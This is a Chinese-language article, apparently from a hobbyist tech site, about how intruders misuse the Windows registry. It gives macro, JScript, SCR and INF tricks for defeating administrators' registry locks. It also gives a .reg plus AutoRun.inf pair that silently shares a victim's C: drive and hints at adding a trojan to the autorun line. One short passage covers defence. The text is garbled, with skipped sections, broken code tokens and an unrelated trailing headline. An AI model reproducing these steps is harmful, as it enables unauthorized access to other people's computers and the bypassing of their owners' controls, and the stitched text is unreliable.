笔者发现现在介绍注册表的书籍的重点内容都讲解注册表关于个性化设置和系统优化等部分,而对于现实网络环境下日益猖獗的“黑客”行为、木马病毒以及那些令人恶心的恶意网站却关注甚少。笔者在此就注册表有关安全内容略加阐述,希望能起抛砖引玉之效。
一、注册表与“黑客”行为
“黑客”利用注册表主要包括:
A:突破部分网管软件限制
B:共享特定硬盘分区并运行指定程序
C:启动黑客程序等三方面,而其中又属B、C两方面危害较大。
1、突破部分网管软件限制
现在流行的网管软件基本上都可以对PC机采取隐藏桌面和硬盘特定分区、禁止修改IE浏览器、隐藏“开始”工具栏,封锁注册表编辑器regedit.exe等诸多限制,有的网吧管理员甚至到了变态的地步。于是“自由的战士”便开始利用注册表进行大突围。
Word也可以给注册表解锁?没错!我们利用的是微软在Word中提供的“宏”,没想到吧?具体方法是:运行Word,然后编写如下面所示的这个“Unlock”宏,即可给注册表解锁:
Sub Unlock()
Dim RegPath As String
RegPath = “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System”
System.PrivateProfileString(FileName:=“”,Section:=RegPath,Key:=“Disableregistrytools”)=“OK!”
End Sub
③用JavaScript、VBScript脚本语言解锁
脚本语言解锁注册表,这个没的说,很多恶意网站就是靠它来锁住我们的注册表,现在我们反其道行之用它来解锁注册表。这里只给出JavaScript的核心代码。用记事本编辑如下内容的文件,保存为以.js为后缀名的任意文件,使用时双击就可以了。
VAR WSHShell=WSCRIPT.CREA-TOBJEt(“WSCRIPT.SHELL”);
WSHShell.Popup(“解锁注册表”);
WSHShell.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\system\\DisableRegistryTools”, 0,“reg_dword”);
需要注意:用JS对键值进行操作时要用两斜杠“\\”,并且要用“;”表示结束.
④利用SCR文件给注册表解锁
众所周知,SCR文件是屏保文件,SCR文件如何用来解锁注册表呢?方法是将注册表编辑器regedit.exe改名为Regedit.scr。然后,在桌面上点击鼠标右键,在弹出菜单中选择“属性”,在弹出的“显示属性”对话框中选中“屏幕保护程序”,在“屏幕保护程序”下拉列表框中找到Regedit这个“屏保文件”(图1),最后点击“预览”按纽,你会发现注册表编辑器成功地打开了。再更改相关键值,重启计算机后就可以给注册表解锁了!(记着把SCR文件改回哦!)
图1
⑤用INF文件解锁
在Windows中有一种后缀为INF的驱动安装文件,它实际上是一种脚本语言,通过解释来执行。它包含了设备驱动程序的所有安装信息,其中也有涉及修改注册表的相关语句,所以我们也可以利用INF文件对注册表解锁。
[Version]
Signature=“$CHICAGO$”
[DefaultInstall]
DelReg=UnLock
[UnLock]
HKCU,Software\Microsoft\Windows\CurrentVersion\PoliciesSystem,Disableregistrytools,
1,00,00,00,00
将上面的内容另存为后缀名是.inf的文件,使用时只要右键点击它,在弹出菜单中选择“安装”即可给注册表解锁(如图2)。
图2
首先我们打开记事本编辑reg文件如下:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
\Network\Lanman\C$] //这里我只共享了C盘,需要的可以再加
“Path”=”C:\\”
“Remark”=“ ”
“Type”=dword:00000000
“Flags”=dword:00000192
“Parm1enc”=hex:
“Parm2enc”=hex:
然后另存为ShareDrives.reg文件。
再打开记事本,键入以下内容:
[AutoRun]
open=regedit /s ShareDrives.reg // 这里/s参数作用是导入注册表信息不显示任何提示
再另存为AutoRun.inf文件。
将这两个文件复制到对方共享出来的驱动盘根目录下,此后只要双击共享出来的驱动盘就会自动将ShareDrives.reg文件导入注册表,对方重启系统后C盘也就共享出来了。试想想,我们如果在 “open=…”句后添上木马名并将已配置好的木马服务端一起复制过去,以后会怎样?
那么如何对付这种攻击呢?因为硬盘根目录下基本不需要AutoRun.inf文件来运行程序,因此我们可以采用一个一劳永逸的办法就是将硬盘的AutoRun功能完全关闭,这样即使硬盘根目录下有AutoRun.inf文件,操作系统也不会运行指定的程序。Win98为例,打开注册表编辑器,找到[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]主键,在注册表编辑器右侧框中可以看到有二进制值“NoDriveTypeAutoRun”,最后只需要将其数据数值由默认的“95 00 00 00”改为“9d 00 00 00”就可以了。其原理我就不在讲解了。
3、启动黑客程序
利用注册表启动黑客程序,目的是想每次开机启动时自动运行黑客程序,这同时也是很多木马病毒自启动常用的方法之一。普遍的方法是在将黑客程序名及参数添加到注册表相应的键值下,这样一来,每次开机时计算机将自动加载相应的注册表项,进而使黑客程序达到常驻内存的目的。另外还有更为隐蔽的方法会在“注册表与木马病毒”部分详细介绍。
下面我们打开
一文秒懂 | 什么是云MSP?
